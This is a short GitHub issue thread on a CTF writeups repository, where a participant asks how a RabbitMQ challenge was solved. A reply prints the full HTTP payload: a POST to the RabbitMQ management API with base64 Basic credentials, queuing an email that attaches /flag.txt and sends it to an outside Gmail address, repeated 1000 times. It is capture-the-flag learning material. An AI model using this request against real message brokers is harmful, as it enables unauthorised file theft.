### ISSUE TITLE
Question 

### ISSUE THREAD

**Issue by carlospolop** [ByteBandits/writeups#4]
Sorry guys,
I've been trying this challenge but I cannot manage to get the flag, probably because the TCP connection is closed soon and rabbitmq isn't correctly grabbing the request.
I have tried adding a lot of null bytes and also adding a lot of GET request after the POST request with the new input to the queue in order to make the TCP connection last more. But it is not working.
What did you do? what is inside your `payload_bak`?
Thank you.

**Comment by Mrigank11** [comment]
@carlospolop `payload_bak` contains the original payload:
```
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
So, the final payload contains `1000` copies of this. The relevant section in the writeup:
![image](https://user-images.githubusercontent.com/16872657/79895016-e0e44700-8423-11ea-8f1e-1e9e6cf04e41.png)

The author has also tweeted about this trick: https://twitter.com/zwad3/status/1252087190278082562

Hope that helps! Feel free to reopen if you have any doubt.

**Comment by carlospolop** [comment]
Thank you very much guys, with that info I finally got the flag.
